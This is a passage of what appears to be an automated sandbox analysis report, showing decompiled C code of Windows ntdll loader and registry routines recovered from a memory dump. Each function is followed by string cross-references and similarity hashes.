                                            						if(_t87 != 0) {
                                            							_t118 = _t87 + 0x5d8;
                                            							__eflags = _t118;
                                            							if(_t118 == 0) {
                                            								L46:
                                            								_t118 = 0;
                                            							} else {
                                            								__eflags =  *(_t118 + 0x30);
                                            								if( *(_t118 + 0x30) == 0) {
                                            									goto L46;
                                            								}
                                            							}
                                            						}
                                            						_v32 = 0;
                                            						_v28 = 0;
                                            						_v16 = 0;
                                            						_v20 = 0;
                                            						_v12 = 0;
                                            						__eflags = _t118;
                                            						if(_t118 != 0) {
                                            							__eflags = _t161;
                                            							if(_t161 != 0) {
                                            								__eflags =  *(_t118 + 8);
                                            								if( *(_t118 + 8) == 0) {
                                            									L22:
                                            									_t143 = 1;
                                            									__eflags = 1;
                                            								} else {
                                            									_t19 = _t118 + 0x40; // 0x40
                                            									_t156 = _t19;
                                            									E01238999(_t19,  &_v16);
                                            									__eflags = _v0;
                                            									if(_v0 != 0) {
                                            										__eflags = _v0 - 1;
                                            										if(_v0 != 1) {
                                            											goto L22;
                                            										} else {
                                            											_t128 =  *(_t161 + 0x64);
                                            											__eflags =  *(_t161 + 0x64);
                                            											if( *(_t161 + 0x64) == 0) {
                                            												goto L22;
                                            											} else {
                                            												E01238999(_t128,  &_v12);
                                            												_t147 = _v12;
                                            												_t91 = 0;
                                            												__eflags = 0;
                                            												_t129 =  *_t147;
                                            												while(1) {
                                            													__eflags =  *((intOrPtr*)(0x1315c60 + _t91 * 8)) - _t129;
                                            													if( *((intOrPtr*)(0x1315c60 + _t91 * 8)) == _t129) {
                                            														break;
                                            													}
                                            													_t91 = _t91 + 1;
                                            													__eflags = _t91 - 5;
                                            													if(_t91 < 5) {
                                            														continue;
                                            													} else {
                                            														_t131 = 0;
                                            														__eflags = 0;
                                            													}
                                            													L37:
                                            													__eflags = _t131;
                                            													if(_t131 != 0) {
                                            														goto L22;
                                            													} else {
                                            														__eflags = _v16 - _t147;
                                            														if(_v16 != _t147) {
                                            															goto L22;
                                            														} else {
                                            															E01242280(_t92, 0x13186cc);
                                            															_t94 = E012F9DFB( &_v20);
                                            															__eflags = _t94 - 1;
                                            															if(_t94 != 1) {
                                            															}
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															 *_t118 =  *_t118 + 1;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															_t95 = E012561A0( &_v32);
                                            															__eflags = _t95;
                                            															if(_t95 != 0) {
                                            																__eflags = _v32 | _v28;
                                            																if((_v32 | _v28) != 0) {
                                            																	_t71 = _t118 + 0x40; // 0x3f
                                            																	_t134 = _t71;
                                            																	goto L55;
                                            																}
                                            															}
                                            															goto L30;
                                            														}
                                            													}
                                            													goto L56;
                                            												}
                                            												_t92 = 0x1315c64 + _t91 * 8;
                                            												asm("lock xadd [eax], ecx");
                                            												_t131 = (_t129 | 0xffffffff) - 1;
                                            												goto L37;
                                            											}
                                            										}
                                            										goto L56;
                                            									} else {
                                            										_t143 = E01238A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                            										__eflags = _t143;
                                            										if(_t143 != 0) {
                                            											_t157 = _v12;
                                            											_t103 = 0;
                                            											__eflags = 0;
                                            											_t136 =  &(_t157[1]);
                                            											 *(_t161 + 0x64) = _t136;
                                            											_t151 =  *_t157;
                                            											_v20 = _t136;
                                            											while(1) {
                                            												__eflags =  *((intOrPtr*)(0x1315c60 + _t103 * 8)) - _t151;
                                            												if( *((intOrPtr*)(0x1315c60 + _t103 * 8)) == _t151) {
                                            													break;
                                            												}
                                            												_t103 = _t103 + 1;
                                            												__eflags = _t103 - 5;
                                            												if(_t103 < 5) {
                                            													continue;
                                            												}
                                            												L21:
                                            												_t105 = E0126F380(_t136, 0x1201184, 0x10);
                                            												__eflags = _t105;
                                            												if(_t105 != 0) {
                                            													__eflags =  *_t157 -  *_v16;
                                            													if( *_t157 >=  *_v16) {
                                            														goto L22;
                                            													} else {
                                            														asm("cdq");
                                            														_t166 = _t157[5] & 0x0000ffff;
                                            														_t108 = _t157[5] & 0x0000ffff;
                                            														asm("cdq");
                                            														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                            														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                            														if(__eflags > 0) {
                                            															L29:
                                            															E01242280(_t108, 0x13186cc);
                                            															 *_t118 =  *_t118 + 1;
                                            															_t42 = _t118 + 0x40; // 0x3f
                                            															_t156 = _t42;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															_t110 = E012561A0( &_v32);
                                            															__eflags = _t110;
                                            															if(_t110 != 0) {
                                            																__eflags = _v32 | _v28;
                                            																if((_v32 | _v28) != 0) {
                                            																	_t134 = _v20;
                                            																	L55:
                                            																	E012F9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                            																}
                                            															}
                                            															L30:
                                            															 *_t118 =  *_t118 + 1;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															E0123FFB0(_t118, _t156, 0x13186cc);
                                            															goto L22;
                                            														} else {
                                            															if(__eflags < 0) {
                                            																goto L22;
                                            															} else {
                                            																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                            																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                            																	goto L22;
                                            																} else {
                                            																	goto L29;
                                            																}
                                            															}
                                            														}
                                            													}
                                            													goto L56;
                                            												}
                                            												goto L22;
                                            											}
                                            											asm("lock inc dword [eax]");
                                            											goto L21;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						return _t143;
                                            					}
                                            				} else {
                                            					_push( &_v8);
                                            					_push( *((intOrPtr*)(__ecx + 0x50)));
                                            					_push(__ecx + 0x40);
                                            					_push(_t121);
                                            					_push(0xffffffff);
                                            					_t80 = E01269A00();
                                            					_t159 = _t80;
                                            					if(_t159 < 0) {
                                            						L8:
                                            						return _t80;
                                            					} else {
                                            						goto L2;
                                            					}
                                            				}
                                            				L56:
                                            			}

                                            Strings
                                            • LdrpDoPostSnapWork, xrefs: 01289C1E
                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01289C18
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01289C28
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 2994545307-1948996284
                                            • Opcode ID: 6fc2c653470430ab2d1f961f1411c5c000876e57e9eed909a2cdd658f3ce3a2e
                                            • Instruction ID: a2da4bd4151a096d1a3e7af1f221b3463bfa1593c7e058dbe4236d68051eca9e
                                            • Opcode Fuzzy Hash: 6fc2c653470430ab2d1f961f1411c5c000876e57e9eed909a2cdd658f3ce3a2e
                                            • Instruction Fuzzy Hash: 2891F3B1A2020B9BEF19DF59D881A7AB7B5FFC4314B544269FA01AF241D770EA41CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E01237E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				char _v24;
                                            				signed int _t73;
                                            				void* _t77;
                                            				char* _t82;
                                            				char* _t87;
                                            				signed char* _t97;
                                            				signed char _t102;
                                            				intOrPtr _t107;
                                            				signed char* _t108;
                                            				intOrPtr _t112;
                                            				intOrPtr _t124;
                                            				intOrPtr _t125;
                                            				intOrPtr _t126;
                                            
                                            				_t107 = __edx;
                                            				_v12 = __ecx;
                                            				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                            				_t124 = 0;
                                            				_v20 = __edx;
                                            				if(E0123CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                            					_t112 = _v8;
                                            				} else {
                                            					_t112 = 0;
                                            					_v8 = 0;
                                            				}
                                            				if(_t112 != 0) {
                                            					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                            						_t124 = 0xc000007b;
                                            						goto L8;
                                            					}
                                            					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                            					 *(_t125 + 0x34) = _t73;
                                            					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                            						goto L3;
                                            					}
                                            					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                            					_t124 = E0122C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                            					if(_t124 < 0) {
                                            						goto L8;
                                            					} else {
                                            						goto L3;
                                            					}
                                            				} else {
                                            					L3:
                                            					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                            						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                            						L8:
                                            						return _t124;
                                            					}
                                            					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                            						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                            							goto L5;
                                            						}
                                            						_t102 =  *0x1315780; // 0x0
                                            						if((_t102 & 0x00000003) != 0) {
                                            							E012A5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                            							_t102 =  *0x1315780; // 0x0
                                            						}
                                            						if((_t102 & 0x00000010) != 0) {
                                            							asm("int3");
                                            						}
                                            						_t124 = 0xc0000428;
                                            						goto L8;
                                            					}
                                            					L5:
                                            					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                            						goto L8;
                                            					}
                                            					_t77 = _a4 - 0x40000003;
                                            					if(_t77 == 0 || _t77 == 0x33) {
                                            						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                            						if(E01247D50() != 0) {
                                            							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            						} else {
                                            							_t82 = 0x7ffe0384;
                                            						}
                                            						_t108 = 0x7ffe0385;
                                            						if( *_t82 != 0) {
                                            							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                            								if(E01247D50() == 0) {
                                            									_t97 = 0x7ffe0385;
                                            								} else {
                                            									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            								}
                                            								if(( *_t97 & 0x00000020) != 0) {
                                            									E012A7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                            								}
                                            							}
                                            						}
                                            						if(_a4 != 0x40000003) {
                                            							L14:
                                            							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                            							if(E01247D50() != 0) {
                                            								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            							} else {
                                            								_t87 = 0x7ffe0384;
                                            							}
                                            							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                            								if(E01247D50() != 0) {
                                            									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            								}
                                            								if(( *_t108 & 0x00000020) != 0) {
                                            									E012A7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                            								}
                                            							}
                                            							goto L8;
                                            						} else {
                                            							_v16 = _t125 + 0x24;
                                            							_t124 = E0125A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                            							if(_t124 < 0) {
                                            								E0122B1E1(_t124, 0x1490, 0, _v16);
                                            								goto L8;
                                            							}
                                            							goto L14;
                                            						}
                                            					} else {
                                            						goto L8;
                                            					}
                                            				}
                                            			}
                                            0x01237f0a
                                            0x01237f0e
                                            0x01289933
                                            0x00000000
                                            0x01289933
                                            0x00000000
                                            0x01237f0e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01237eb1

                                            Strings
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 01289891
                                            • LdrpCompleteMapModule, xrefs: 01289898
                                            • minkernel\ntdll\ldrmap.c, xrefs: 012898A2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: c42ef78a6940241b2e2d14d32896b5280f4f34ad9261dee657e2484fc7209e75
                                            • Instruction ID: caf80756643bab3e2dfb584000401125cd3235cbe114232e874aa458b3ff2095
                                            • Opcode Fuzzy Hash: c42ef78a6940241b2e2d14d32896b5280f4f34ad9261dee657e2484fc7209e75
                                            • Instruction Fuzzy Hash: 075100B1634742DBEF22DB6CC844B3A7BE4AB80714F040699EA519B7D1C770ED40CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0122E620(void* __ecx, short* __edx, short* _a4) {
                                            				char _v16;
                                            				char _v20;
                                            				intOrPtr _v24;
                                            				char* _v28;
                                            				char _v32;
                                            				char _v36;
                                            				char _v44;
                                            				signed int _v48;
                                            				intOrPtr _v52;
                                            				void* _v56;
                                            				void* _v60;
                                            				char _v64;
                                            				void* _v68;
                                            				void* _v76;
                                            				void* _v84;
                                            				signed int _t59;
                                            				signed int _t74;
                                            				signed short* _t75;
                                            				signed int _t76;
                                            				signed short* _t78;
                                            				signed int _t83;
                                            				short* _t93;
                                            				signed short* _t94;
                                            				short* _t96;
                                            				void* _t97;
                                            				signed int _t99;
                                            				void* _t101;
                                            				void* _t102;
                                            
                                            				_t80 = __ecx;
                                            				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                            				_t96 = __edx;
                                            				_v44 = __edx;
                                            				_t78 = 0;
                                            				_v56 = 0;
                                            				if(__ecx == 0 || __edx == 0) {
                                            					L28:
                                            					_t97 = 0xc000000d;
                                            				} else {
                                            					_t93 = _a4;
                                            					if(_t93 == 0) {
                                            						goto L28;
                                            					}
                                            					_t78 = E0122F358(__ecx, 0xac);
                                            					if(_t78 == 0) {
                                            						_t97 = 0xc0000017;
                                            						L6:
                                            						if(_v56 != 0) {
                                            							_push(_v56);
                                            							E012695D0();
                                            						}
                                            						if(_t78 != 0) {
                                            							L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                            						}
                                            						return _t97;
                                            					}
                                            					E0126FA60(_t78, 0, 0x158);
                                            					_v48 = _v48 & 0x00000000;
                                            					_t102 = _t101 + 0xc;
                                            					 *_t96 = 0;
                                            					 *_t93 = 0;
                                            					E0126BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                            					_v36 = 0x18;
                                            					_v28 =  &_v44;
                                            					_v64 = 0;
                                            					_push( &_v36);
                                            					_push(0x20019);
                                            					_v32 = 0;
                                            					_push( &_v64);
                                            					_v24 = 0x40;
                                            					_v20 = 0;
                                            					_v16 = 0;
                                            					_t97 = E01269600();
                                            					if(_t97 < 0) {
                                            						goto L6;
                                            					}
                                            					E0126BB40(0,  &_v36, L"InstallLanguageFallback");
                                            					_push(0);
                                            					_v48 = 4;
                                            					_t97 = L0122F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                            					if(_t97 >= 0) {
                                            						if(_v52 != 1) {
                                            							L17:
                                            							_t97 = 0xc0000001;
                                            							goto L6;
                                            						}
                                            						_t59 =  *_t78 & 0x0000ffff;
                                            						_t94 = _t78;
                                            						_t83 = _t59;
                                            						if(_t59 == 0) {
                                            							L19:
                                            							if(_t83 == 0) {
                                            								L23:
                                            								E0126BB40(_t83, _t102 + 0x24, _t78);
                                            								if(L012343C0( &_v48,  &_v64) == 0) {
                                            									goto L17;
                                            								}
                                            								_t84 = _v48;
                                            								 *_v48 = _v56;
                                            								if( *_t94 != 0) {
                                            									E0126BB40(_t84, _t102 + 0x24, _t94);
                                            									if(L012343C0( &_v48,  &_v64) != 0) {
                                            										 *_a4 = _v56;
                                            									} else {
                                            										_t97 = 0xc0000001;
                                            										 *_v48 = 0;
                                            									}
                                            								}
                                            								goto L6;
                                            							}
                                            							_t83 = _t83 & 0x0000ffff;
                                            							while(_t83 == 0x20) {
                                            								_t94 =  &(_t94[1]);
                                            								_t74 =  *_t94 & 0x0000ffff;
                                            								_t83 = _t74;
                                            								if(_t74 != 0) {
                                            									continue;
                                            								}
                                            								goto L23;
                                            							}
                                            							goto L23;
                                            						} else {
                                            							goto L14;
                                            						}
                                            						while(1) {
                                            							L14:
                                            							_t27 =  &(_t94[1]); // 0x2
                                            							_t75 = _t27;
                                            							if(_t83 == 0x2c) {
                                            								break;
                                            							}
                                            							_t94 = _t75;
                                            							_t76 =  *_t94 & 0x0000ffff;
                                            							_t83 = _t76;
                                            							if(_t76 != 0) {
                                            								continue;
                                            							}
                                            							goto L23;
                                            						}
                                            						 *_t94 = 0;
                                            						_t94 = _t75;
                                            						_t83 =  *_t75 & 0x0000ffff;
                                            						goto L19;
                                            					}
                                            				}
                                            			}

                                            Strings
                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0122E68C
                                            • InstallLanguageFallback, xrefs: 0122E6DB
                                            • @, xrefs: 0122E6C0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                            • API String ID: 0-1757540487
                                            • Opcode ID: 9793f178ddfb9b103da1637530b6f0b6eafa890904ca809eae09633a445a1aca
                                            • Instruction ID: ba145e3ebe53186c0260fd860584b33292682dec3c9574cdff110f85257ff09d
                                            • Opcode Fuzzy Hash: 9793f178ddfb9b103da1637530b6f0b6eafa890904ca809eae09633a445a1aca
                                            • Instruction Fuzzy Hash: F651E2726253569BD714EF28C440A7BB3E8FF98614F05092EFA85D7290F734D944C7A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E012EE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                            				signed int _v20;
                                            				char _v24;
                                            				signed int _v40;
                                            				char _v44;
                                            				intOrPtr _v48;
                                            				signed int _v52;
                                            				unsigned int _v56;
                                            				char _v60;
                                            				signed int _v64;
                                            				char _v68;
                                            				signed int _v72;
                                            				void* __ebx;
                                            				void* __edi;
                                            				char _t87;
                                            				signed int _t90;
                                            				signed int _t94;
                                            				signed int _t100;
                                            				intOrPtr* _t113;
                                            				signed int _t122;
                                            				void* _t132;
                                            				void* _t135;
                                            				signed int _t139;
                                            				signed int* _t141;
                                            				signed int _t146;
                                            				signed int _t147;
                                            				void* _t153;
                                            				signed int _t155;
                                            				signed int _t159;
                                            				char _t166;
                                            				void* _t172;
                                            				void* _t176;
                                            				signed int _t177;
                                            				intOrPtr* _t179;
                                            
                                            				_t179 = __ecx;
                                            				_v48 = __edx;
                                            				_v68 = 0;
                                            				_v72 = 0;
                                            				_push(__ecx[1]);
                                            				_push( *__ecx);
                                            				_push(0);
                                            				_t153 = 0x14;
                                            				_t135 = _t153;
                                            				_t132 = E012EBBBB(_t135, _t153);
                                            				if(_t132 == 0) {
                                            					_t166 = _v68;
                                            					goto L43;
                                            				} else {
                                            					_t155 = 0;
                                            					_v52 = 0;
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					asm("stosd");
                                            					_v56 = __ecx[1];
                                            					if( *__ecx >> 8 < 2) {
                                            						_t155 = 1;
                                            						_v52 = 1;
                                            					}
                                            					_t139 = _a4;
                                            					_t87 = (_t155 << 0xc) + _t139;
                                            					_v60 = _t87;
                                            					if(_t87 < _t139) {
                                            						L11:
                                            						_t166 = _v68;
                                            						L12:
                                            						if(_t132 != 0) {
                                            							E012EBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                            						}
                                            						L43:
                                            						if(_v72 != 0) {
                                            							_push( *((intOrPtr*)(_t179 + 4)));
                                            							_push( *_t179);
                                            							_push(0x8000);
                                            							E012EAFDE( &_v72,  &_v60);
                                            						}
                                            						L46:
                                            						return _t166;
                                            					}
                                            					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                            					asm("sbb edi, edi");
                                            					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                            					if(_t90 != 0) {
                                            						_push(0);
                                            						_push(0x14);
                                            						_push( &_v44);
                                            						_push(3);
                                            						_push(_t179);
                                            						_push(0xffffffff);
                                            						if(E01269730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                            							_push(_t139);
                                            							E012EA80D(_t179, 1, _v40, 0);
                                            							_t172 = 4;
                                            						}
                                            					}
                                            					_t141 =  &_v72;
                                            					if(E012EA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                            						_v64 = _a4;
                                            						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                            						asm("sbb edi, edi");
                                            						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                            						if(_t94 != 0) {
                                            							_push(0);
                                            							_push(0x14);
                                            							_push( &_v24);
                                            							_push(3);
                                            							_push(_t179);
                                            							_push(0xffffffff);
                                            							if(E01269730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                            								_push(_t141);
                                            								E012EA80D(_t179, 1, _v20, 0);
                                            								_t176 = 4;
                                            							}
                                            						}
                                            						if(E012EA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                            							goto L11;
                                            						} else {
                                            							_t177 = _v64;
                                            							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                            							_t100 = _v52 + _v52;
                                            							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                            							 *(_t132 + 0x10) = _t146;
                                            							asm("bsf eax, [esp+0x18]");
                                            							_v52 = _t100;
                                            							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                            							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                            							_t47 =  &_a8;
                                            							 *_t47 = _a8 & 0x00000001;
                                            							if( *_t47 == 0) {
                                            								E01242280(_t179 + 0x30, _t179 + 0x30);
                                            							}
                                            							_t147 =  *(_t179 + 0x34);
                                            							_t159 =  *(_t179 + 0x38) & 1;
                                            							_v68 = 0;
                                            							if(_t147 == 0) {
                                            								L35:
                                            								E0123B090(_t179 + 0x34, _t147, _v68, _t132);
                                            								if(_a8 == 0) {
                                            									E0123FFB0(_t132, _t177, _t179 + 0x30);
                                            								}
                                            								asm("lock xadd [eax], ecx");
                                            								asm("lock xadd [eax], edx");
                                            								_t132 = 0;
                                            								_v72 = _v72 & 0;
                                            								_v68 = _v72;
                                            								if(E01247D50() == 0) {
                                            									_t113 = 0x7ffe0388;
                                            								} else {
                                            									_t177 = _v64;
                                            									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            								}
                                            								if( *_t113 == _t132) {
                                            									_t166 = _v68;
                                            									goto L46;
                                            								} else {
                                            									_t166 = _v68;
                                            									E012DFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                            									goto L12;
                                            								}
                                            							} else {
                                            								L23:
                                            								while(1) {
                                            									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                            										_t122 =  *_t147;
                                            										if(_t159 == 0) {
                                            											L32:
                                            											if(_t122 == 0) {
                                            												L34:
                                            												_v68 = 0;
                                            												goto L35;
                                            											}
                                            											L33:
                                            											_t147 = _t122;
                                            											continue;
                                            										}
                                            										if(_t122 == 0) {
                                            											goto L34;
                                            										}
                                            										_t122 = _t122 ^ _t147;
                                            										goto L32;
                                            									}
                                            									_t122 =  *(_t147 + 4);
                                            									if(_t159 == 0) {
                                            										L27:
                                            										if(_t122 != 0) {
                                            											goto L33;
                                            										}
                                            										L28:
                                            										_v68 = 1;
                                            										goto L35;
                                            									}
                                            									if(_t122 == 0) {
                                            										goto L28;
                                            									}
                                            									_t122 = _t122 ^ _t147;
                                            									goto L27;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					_v72 = _v72 & 0x00000000;
                                            					goto L11;
                                            				}
                                            			}


                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                            • Instruction ID: 23cf4016b5fa5996d0d920e2922dfa20af07209b45ce853f1df275f7ece5c9de
                                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                            • Instruction Fuzzy Hash: CE91D4712243429FE724CF29C849B2BBBE5BF84714F55892DF695CB290E774E804CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E012A51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                            				signed short* _t63;
                                            				signed int _t64;
                                            				signed int _t65;
                                            				signed int _t67;
                                            				intOrPtr _t74;
                                            				intOrPtr _t84;
                                            				intOrPtr _t88;
                                            				intOrPtr _t94;
                                            				void* _t100;
                                            				void* _t103;
                                            				intOrPtr _t105;
                                            				signed int _t106;
                                            				short* _t108;
                                            				signed int _t110;
                                            				signed int _t113;
                                            				signed int* _t115;
                                            				signed short* _t117;
                                            				void* _t118;
                                            				void* _t119;
                                            
                                            				_push(0x80);
                                            				_push(0x13005f0);
                                            				E0127D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                            				_t115 =  *(_t118 + 0xc);
                                            				 *(_t118 - 0x7c) = _t115;
                                            				 *((char*)(_t118 - 0x65)) = 0;
                                            				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                            				_t113 = 0;
                                            				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                            				 *((intOrPtr*)(_t118 - 4)) = 0;
                                            				_t100 = __ecx;
                                            				if(_t100 == 0) {
                                            					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                            					E0123EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            					 *((char*)(_t118 - 0x65)) = 1;
                                            					_t63 =  *(_t118 - 0x90);
                                            					_t101 = _t63[2];
                                            					_t64 =  *_t63 & 0x0000ffff;
                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                            					L20:
                                            					_t65 = _t64 >> 1;
                                            					L21:
                                            					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                            					if(_t108 == 0) {
                                            						L27:
                                            						 *_t115 = _t65 + 1;
                                            						_t67 = 0xc0000023;
                                            						L28:
                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                            						L29:
                                            						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                            						E012A53CA(0);
                                            						return E0127D130(0, _t113, _t115);
                                            					}
                                            					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                            						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                            							 *_t108 = 0;
                                            						}
                                            						goto L27;
                                            					}
                                            					 *_t115 = _t65;
                                            					_t115 = _t65 + _t65;
                                            					E0126F3E0(_t108, _t101, _t115);
                                            					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                            					_t67 = 0;
                                            					goto L28;
                                            				}
                                            				_t103 = _t100 - 1;
                                            				if(_t103 == 0) {
                                            					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                            					_t74 = E01243690(1, _t117, 0x1201810, _t118 - 0x74);
                                            					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                            					_t101 = _t117[2];
                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                            					if(_t74 < 0) {
                                            						_t64 =  *_t117 & 0x0000ffff;
                                            						_t115 =  *(_t118 - 0x7c);
                                            						goto L20;
                                            					}
                                            					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                            					_t115 =  *(_t118 - 0x7c);
                                            					goto L21;
                                            				}
                                            				if(_t103 == 1) {
                                            					_t105 = 4;
                                            					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                            					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                            					_push(_t118 - 0x70);
                                            					_push(0);
                                            					_push(0);
                                            					_push(_t105);
                                            					_push(_t118 - 0x78);
                                            					_push(0x6b);
                                            					 *((intOrPtr*)(_t118 - 0x64)) = E0126AA90();
                                            					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                            					_t113 = L01244620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                            					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                            					if(_t113 != 0) {
